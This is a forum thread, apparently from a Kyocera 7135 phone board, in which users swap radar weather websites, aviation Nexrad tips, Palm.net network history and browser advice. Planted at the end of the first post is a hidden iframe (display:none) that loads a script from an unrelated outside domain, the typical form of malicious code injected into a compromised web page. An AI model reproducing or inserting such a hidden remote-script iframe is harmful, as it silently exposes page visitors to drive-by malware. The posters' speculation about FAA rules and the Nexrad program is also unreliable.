First LL game tonight and expecting thunderstorms. Is there a web site that I can access that will show the radar in motion? Located in Western PA. I have tried weather.com and local TV station websites that have good radar maps on my PC, but when I access the same sites on 7135, can't get the actual maps to be visible. I have only software that came with the phone so far. Last time I tried to load the long specific web address for the map for my area code, I got a fatal error and had to soft reset.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
Try these! They take a minute or two to load, but are pretty good. I suggest going to the web site, picking out the map type and region you care about, then e-mail it over to the phone where you can cut and paste it into the Browser.
Thanks to Palmdale for the radar web pages. The one thing I don't like about them is
that there's a lot of other info on the page that makes them load slowly - I remember
back in the early days of the 6035 (say June, 2001), someone on the forum pointed us
to some NOAA weather sites that had very little other on the page than the radar map
itself. I have searched for "NOAA" on the 6035 forum, and it's not there (maybe the
articles aren't archived that far back).
As for the Intellicast web pages, they are pretty good, but I can't for the life of me
figure out their choice in cities. They don't have my city, Pittsburgh, but they
have Staunton, VA. However, Cleveland gives a pretty good view of my home area.
Some of the NWS sites have options for formatting which allow you to select a specific page within the site containing only the graphics you're looking for. (The KPIX site links to the San Francisco-area NWS text site.) I haven't tried going to other cities from there, but if you play around with it on your browser at home you should be able to track down what you need and then note the URL for your phone.
Pilots use CBAW (Cheap Bastards Aviation Weather) palm application program for wireless palms. Thru this app they obtain Nexrad radar images (on the ground before they fly). Here is the Nexrad web site:

I'm assuming, since these are all aviation sites, you're a pilot??
What do you fly??
Tom
Tom,
Nope, just was trying to help someone else with a question and got into the pilot arena where weather is a big issue.
Something interesting, is the Palm network. Supposedly, it is there own network set up on all kinds of radio towers, and is independent of and different from cellular systems. Thus, some claim using a palm pilot and nexrad for a couple hundred bucks could be used in small planes instead of a $5,000.00+ approved radar systems by the FAA. Thus, getting around the rule that cellular can not be used. Maybe that is why the Nexrad program was stopped.
It is now owned by Cingular, but it is separate from cellular.
The network actual was the RAM Mobile Data.
Its competitor was the Ardis/Motient network.
It is a two way data packet only network.
I would point out that CBAW and most of the other free Nexrad websites actually "sample" the live Nexrad on an interval basis... sometimes as much as 15 minutes apart. I doubt this non-realtime radar would be that much use to a pilot.
Palm.net is on my list of things to learn more about. And that system being different is what is most interesting to me.
Like I said I only recently read about the flying thing. And was probably totally stupid to make a comment on it. I'm not a pilot and never plan on being one. Note: I mentioned the FAA rules because if people use a palm powered cellular phone and the palm network, then they should be aware that set up may not be in compliance with the rules when flying. So, I felt I could not just not mention it, either. Realize that within this year the Kyocera 7135 may spread across America to new users beyond anyone's dream in numbers, and with GPS service many may want to have it turned on in flight.
I am using the Eudora Browser that came with the phone and I am not getting radar images to load -- just the text box that says "radar image". Are you all using other browsers to get the radar to show? If not, what am I missing?

Thanks.
Eudora is a text only browser, so you will never see images in it. EIS (labeled WEB on the 7135) will show images, but there are several discussions on the board that will provide guidence for choosing the best browser for your needs.
